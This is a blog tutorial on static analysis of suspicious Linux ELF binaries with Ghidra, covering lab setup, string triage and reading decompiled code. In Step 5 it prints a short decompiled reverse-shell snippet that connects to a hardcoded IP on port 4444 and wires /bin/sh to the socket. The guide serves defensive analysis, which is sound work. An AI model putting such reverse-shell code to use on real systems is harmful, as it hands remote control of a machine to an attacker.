Static Malware Analysis with Ghidra: A Hands-on Guide for Linux

Security tutorial - IT technology blog

Why I Start Every Investigation with Static Analysis

A few months ago, an SSH brute-force attack hit my server at 2:00 AM. The attacker managed to drop a 15KB ELF binary into the /tmp directory before the automated block kicked in. That incident changed my approach to security. It wasn’t enough to just patch the hole; I needed to know exactly what that binary was designed to do. Most attackers deploy small, compiled files—ELF for Linux or PE for Windows—to establish persistence or exfiltrate data.

To handle these threats safely, you need to look inside the file without actually running it. This is the essence of static analysis. Ghidra, the open-source reverse engineering suite from the NSA, is the best tool for this job. It allows you to decompile complex binaries into readable C-like code so you can map out an attacker’s intent without risking a system infection.

Static vs. Dynamic Analysis: Look Before You Leap

When you find a suspicious file, you have two ways to investigate. Choosing the right one depends on your goals and your environment.

Static Analysis

Static analysis is my preferred first step because it is inherently safe. You examine the code, headers, and strings while the file sits idle. You aren’t risking a live infection on your host system. By looking at assembly instructions and imported libraries, you can often spot a reverse shell or a keylogger in minutes. However, sophisticated malware uses “packing” or obfuscation to hide its logic until it actually runs.
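
To make "examining headers while the file sits idle" concrete, here is a minimal Python sketch that reads the identification fields at the start of an ELF file without executing anything. The function name and the lookup tables are my own illustration and cover only a handful of architectures; Ghidra's importer does far more than this.

```python
import struct

# A few e_machine and e_type values from the ELF specification (not exhaustive).
MACHINES = {0x03: "x86", 0x08: "MIPS", 0x14: "PowerPC",
            0x28: "ARM", 0x3E: "x86-64", 0xB7: "AArch64"}
TYPES = {1: "relocatable", 2: "executable", 3: "shared object or PIE", 4: "core dump"}


def parse_elf_header(data: bytes) -> dict:
    """Read basic identification fields from the first bytes of an ELF file."""
    # Every field read below fits within the first 32 bytes of the file.
    if len(data) < 32 or data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    is_64 = data[4] == 2                      # EI_CLASS: 1 = 32-bit, 2 = 64-bit
    endian = "<" if data[5] == 1 else ">"     # EI_DATA: 1 = little, 2 = big endian
    # e_type and e_machine are two 16-bit fields right after the 16-byte e_ident.
    e_type, e_machine = struct.unpack_from(endian + "HH", data, 16)
    # e_entry follows the 4-byte e_version field, so it starts at offset 24.
    (entry,) = struct.unpack_from(endian + ("Q" if is_64 else "I"), data, 24)
    return {
        "bits": 64 if is_64 else 32,
        "endianness": "little" if endian == "<" else "big",
        "type": TYPES.get(e_type, "unknown (%d)" % e_type),
        "machine": MACHINES.get(e_machine, "unknown (0x%x)" % e_machine),
        "entry": entry,
    }
```

To try it on a sample, read the first bytes with open(path, "rb").read(64) and pass them in. Opening a file for reading never runs it, which is the whole point of this stage.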

Dynamic Analysis

Dynamic analysis involves executing the malware in a strictly controlled sandbox or VM. You watch which files it modifies, which processes it spawns, and which IP addresses it contacts (on Windows, you would also watch the registry keys it changes). This reveals the true behavior of the code. The downside is the risk: the sample is actually running. Advanced malware can also detect that it is in a VM and alter its behavior to stay hidden.

The Reality of Using Ghidra

Ghidra is a powerhouse, but it isn’t perfect. If you are choosing between Ghidra, IDA Pro, or Radare2, here is what you need to know.

  • The Good:
    • Zero Cost: It is free and open-source. This is a massive win for independent researchers and small security teams.
    • S-Tier Decompiler: Ghidra includes a high-quality decompiler. It does a fantastic job of turning messy assembly back into C code.
    • Architecture Support: It handles almost everything. Whether it’s x86, ARM, MIPS, or PowerPC, Ghidra can likely parse it.
  • The Bad:
    • RAM Hungry: Because it runs on Java, Ghidra is a resource hog. Expect it to use 2GB of RAM just to idle, and much more when analyzing 50MB+ binaries.
    • Complex UI: The interface looks like a cockpit from the late 90s. It is powerful but has a steep learning curve for beginners.

Setting Up Your Linux Analysis Lab

Don’t run Ghidra on your primary workstation. Use a dedicated analysis VM, such as Kali Linux or a hardened Ubuntu instance. This keeps your main environment clean and isolated.

1. Install the Java Development Kit (JDK)

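The JDK requirement depends on the release: Ghidra 11.0 and 11.1 require JDK 17, while 11.2 and later require JDK 21. Check the release notes for the version you download. On Ubuntu, you can install JDK 17 with a single command (for newer Ghidra releases, install openjdk-21-jdk instead, where your distribution packages it):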

sudo apt update && sudo apt install openjdk-17-jdk -y

Always verify the version by running java -version before proceeding.
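
If you rebuild analysis VMs often, the version check can be scripted. The sketch below pulls the major version out of the text that java -version prints. The function name is hypothetical, and the parsing assumes the usual version "…" banner format.

```python
import re


def java_major_version(version_output: str) -> int:
    """Extract the major Java version from the output of `java -version`."""
    match = re.search(r'version "(\d+)(?:\.(\d+))?', version_output)
    if not match:
        raise ValueError("could not find a version string")
    major = int(match.group(1))
    # Java 8 and earlier report themselves as 1.x (for example "1.8.0_292").
    if major == 1 and match.group(2):
        major = int(match.group(2))
    return major


# Usage, assuming `java` is on the PATH. Note that the banner goes to stderr:
#   import subprocess
#   banner = subprocess.run(["java", "-version"], capture_output=True, text=True).stderr
#   print(java_major_version(banner))
```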

2. Download and Extract

Download the latest stable release from the official GitHub releases page (the NationalSecurityAgency/ghidra repository). Once you have the zip file, extract it to your tools directory:

unzip ghidra_11.x.x_PUBLIC_2024xxxx.zip
cd ghidra_11.x.x_PUBLIC
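
Since this is a security tool running in a security lab, it is worth confirming the archive is intact before you trust it. The Ghidra release notes list a SHA-256 hash for each zip. The following is a small sketch for comparing against it; both function names are my own, and you have to paste in the published hash yourself.

```python
import hashlib


def sha256_of_file(path: str, chunk_size: int = 1 << 20) -> str:
    """Hash a file in chunks so large archives do not need to fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def matches_expected(path: str, expected_hex: str) -> bool:
    """Compare a file's SHA-256 against a published hash, ignoring case and spaces."""
    return sha256_of_file(path) == expected_hex.strip().lower()
```

The same helper is handy later for fingerprinting the suspicious binary itself, since hashing only reads the file.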

3. Fire It Up

Launch the suite using the provided run script:

./ghidraRun

Workflow: Dissecting a Suspicious Binary

Let’s walk through the process of analyzing an unknown ELF file found on a compromised server.

Step 1: Import and Initial Triage

Start by creating a new project (File > New Project) and select “Non-Shared Project.” Press I to import your suspicious binary. Ghidra will automatically detect the format, such as x86-64 ELF. After clicking OK, you’ll see a summary with the entry point and linked libraries. Double-click the file to open the CodeBrowser.

Step 2: Let the Auto-Analyzer Work

When you first open a file, Ghidra will ask to analyze it. Say Yes. This step maps out functions and cross-references. For a standard 1MB binary, this takes about 10 seconds. For massive files, grab a coffee; it might take a few minutes.

Step 3: Hunting for Red Flags in Strings

I always check strings first. Hardcoded IPs, suspicious URLs, or paths like /etc/shadow are dead giveaways. Open Window > Defined Strings. Filter for “http”, “ssh”, or “/tmp”. If you see a domain you don’t recognize, you’ve found your first lead.
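
The same triage can be roughed out outside Ghidra. Here is a minimal sketch that pulls printable ASCII runs out of raw bytes and keeps the ones matching the filters above. The function names and the indicator list are illustrative, and it only handles plain ASCII, whereas Ghidra's Defined Strings view also covers other encodings.

```python
import re

# Substrings worth a second look, taken from the filters mentioned above.
INDICATORS = ("http", "ssh", "/tmp", "/etc/shadow")


def extract_strings(data: bytes, min_length: int = 4) -> list:
    """Return runs of printable ASCII that are at least min_length bytes long."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_length)
    return [match.group().decode("ascii") for match in pattern.finditer(data)]


def flag_strings(strings, indicators=INDICATORS) -> list:
    """Keep only the strings that contain one of the indicator substrings."""
    return [s for s in strings if any(ind in s.lower() for ind in indicators)]
```

Feed it the file contents with open(path, "rb").read(). A hit is a lead to chase in the CodeBrowser, not a verdict, because plenty of legitimate binaries mention /tmp.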

Step 4: Finding the ‘Main’ Logic

Look for main in the Symbol Tree. If the binary is “stripped,” the main symbol will be missing. In that case, find the entry function. It usually calls __libc_start_main, and the first argument passed to that call is the memory address of the actual main function (on x86-64, that is the value loaded into RDI). Double-click that address to jump to it.

Step 5: Reading the Decompiled Code

The Decompile window is where the magic happens. It translates assembly like mov eax, 0x1 into something human-readable like result = 1;. Watch for these specific patterns:

  • Network Activity: Look for socket, connect, or send. A binary connecting to a hardcoded external IP on port 4444, the default Metasploit listener port, is a strong sign of a Command and Control (C2) callback.
  • Persistence: Search for fork followed by setsid. This is how malware “daemonizes”: it detaches from the controlling terminal so it keeps running in the background after the login session ends.
  • Anti-Debugging: Look for ptrace. Malware often calls ptrace with PTRACE_TRACEME, which fails if a debugger is already attached. If the call fails, the malware simply exits.
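
The checklist above can be turned into a quick filter over the function names a binary imports, for example the names listed under Imports in Ghidra's Symbol Tree. This is only a sketch: the watchlist holds just the functions named above, and the category labels are my own.

```python
# Functions from the checklist above, grouped by the behavior they hint at.
WATCHLIST = {
    "network": {"socket", "connect", "send"},
    "daemonize": {"fork", "setsid"},
    "anti-debug": {"ptrace"},
}


def classify_imports(imports) -> dict:
    """Map each watchlist category to the imported functions that match it."""
    names = set(imports)
    found = {}
    for category, functions in WATCHLIST.items():
        hits = sorted(names & functions)
        if hits:
            found[category] = hits
    return found
```

An import alone proves nothing, since any network client calls socket and connect. What matters is the combination, and how the calls are actually used in the decompiled code.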

Here is a classic example of a reverse shell snippet in the decompiler:

// This code opens a connection and redirects the shell
sock = socket(2, 1, 0); // AF_INET (2), SOCK_STREAM (1): a TCP socket
addr.sin_family = 2; // AF_INET
addr.sin_port = htons(0x115c); // Port 4444
addr.sin_addr.s_addr = inet_addr("192.168.1.100");
connect(sock, &addr, 0x10); // 0x10 = 16 bytes, the size of sockaddr_in
dup2(sock, 0); // Redirect STDIN
dup2(sock, 1); // Redirect STDOUT
dup2(sock, 2); // Redirect STDERR
execve("/bin/sh", NULL, NULL); // Replace the process with a shell wired to the socket
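
The decompiler shows raw numbers where the original source used named constants, so it helps to decode them yourself. Below is a small sketch using Python's standard socket and struct modules. The helper names are mine, and the numeric values assume Linux, where AF_INET is 2 and SOCK_STREAM is 1.

```python
import socket
import struct


def describe_socket_call(family: int, sock_type: int, port_constant: int) -> str:
    """Translate the numeric arguments seen in the decompiler into names."""
    family_name = socket.AddressFamily(family).name
    type_name = socket.SocketKind(sock_type).name
    return f"{family_name}, {type_name}, port {port_constant}"


def port_wire_bytes(port: int) -> bytes:
    """Return the port in network byte order, as htons() stores it in sin_port."""
    return struct.pack("!H", port)


print(describe_socket_call(2, 1, 0x115C))
print(port_wire_bytes(0x115C).hex())
```

On Linux this should report AF_INET, SOCK_STREAM, and port 4444, with the port stored as the bytes 11 5c. Those two bytes are what you would search for if you were hunting the port in a hex view.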

Step 6: Cleaning Up the Mess

As you figure out what a variable does, press L to rename it. If you see a variable being used as a file descriptor for a network connection, rename it to network_fd. Press ; to add comments. This turns a wall of gibberish into a documented report.

Final Thoughts

Static analysis is like solving a high-stakes puzzle. You start with a pile of assembly and slowly piece together the story until the attacker’s intent is clear.

Being able to distinguish between a simple script and a sophisticated Remote Access Trojan (RAT) saved me hours of recovery time during my last server breach. Ghidra gives you the clarity needed to make those calls. Just remember: always work in an isolated environment, and never execute the sample unless you are ready for the dynamic analysis phase.
